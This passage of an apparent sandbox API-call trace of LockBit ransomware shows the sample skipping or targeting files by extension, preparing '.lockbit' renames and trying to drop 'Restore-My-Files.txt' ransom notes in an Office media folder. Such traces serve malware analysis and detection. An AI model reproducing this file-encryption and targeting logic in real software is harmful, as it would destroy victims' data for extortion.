(lpString1=".dbf", lpString2=".GIF") returned -1 [0203.459] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.460] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.460] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.460] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.460] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.460] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.460] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.460] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF.lockbit") returned 78 [0203.460] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14831_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.461] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.461] malloc (_Size=0x40068) returned 0x3df0008 [0203.461] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=179) returned 1 [0203.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.462] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.465] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.465] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.465] free (_Block=0x1fa2ed8) [0203.465] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.466] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.466] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.466] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa79e600, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc9ea880, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa79e600, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14832_.GIF", cAlternateFileName="")) returned 1 [0203.466] lstrcmpiW (lpString1=".", lpString2="BD14832_.GIF") returned -1 [0203.466] lstrcmpiW (lpString1="..", lpString2="BD14832_.GIF") returned -1 [0203.466] PathFindExtensionW (pszPath="BD14832_.GIF") returned=".GIF" [0203.466] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.466] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.466] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.467] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.467] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.467] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14832_.GIF") returned 1 [0203.467] lstrcmpiW (lpString1="ntldr", lpString2="BD14832_.GIF") returned 1 [0203.467] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14832_.GIF") returned 1 [0203.467] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14832_.GIF") returned 1 [0203.467] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14832_.GIF") returned -1 [0203.467] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14832_.GIF") returned 1 [0203.467] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14832_.GIF") returned 1 [0203.467] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.467] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF") returned=".GIF" [0203.467] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.467] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.467] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.467] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.467] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.467] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.468] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.468] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.468] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF.lockbit") returned 78 [0203.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14832_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.473] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.473] malloc (_Size=0x40068) returned 0x3df0008 [0203.473] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=180) returned 1 [0203.473] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.473] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.474] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.477] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.477] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.477] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.477] free (_Block=0x1fa2ed8) [0203.477] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.477] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.477] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa79e600, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca109e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa79e600, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14833_.GIF", cAlternateFileName="")) returned 1 [0203.477] lstrcmpiW (lpString1=".", lpString2="BD14833_.GIF") returned -1 [0203.477] lstrcmpiW (lpString1="..", lpString2="BD14833_.GIF") returned -1 [0203.477] PathFindExtensionW (pszPath="BD14833_.GIF") returned=".GIF" [0203.477] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.477] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.477] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.477] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.477] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.477] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.477] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.477] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.477] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.478] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.478] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.478] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.478] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.478] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.478] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.478] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14833_.GIF") returned 1 [0203.478] lstrcmpiW (lpString1="ntldr", lpString2="BD14833_.GIF") returned 1 [0203.478] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14833_.GIF") returned 1 [0203.478] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14833_.GIF") returned 1 [0203.478] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14833_.GIF") returned -1 [0203.478] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14833_.GIF") returned 1 [0203.479] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14833_.GIF") returned 1 [0203.479] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.479] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF") returned=".GIF" [0203.479] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.479] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.479] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.479] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF.lockbit") returned 78 [0203.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14833_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.481] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.481] malloc (_Size=0x40068) returned 0x3df0008 [0203.481] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=178) returned 1 [0203.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.482] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.485] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.485] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.485] free (_Block=0x1fa2ed8) [0203.485] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.485] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.485] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.485] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1796d500, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca109e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1796d500, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14866_.GIF", cAlternateFileName="")) returned 1 [0203.485] lstrcmpiW (lpString1=".", lpString2="BD14866_.GIF") returned -1 [0203.485] lstrcmpiW (lpString1="..", lpString2="BD14866_.GIF") returned -1 [0203.485] PathFindExtensionW (pszPath="BD14866_.GIF") returned=".GIF" [0203.485] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.485] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.485] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.485] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.485] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.485] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.485] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.485] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.485] lstrcmpiW (lpString1=".com", lpString2=".GIF") 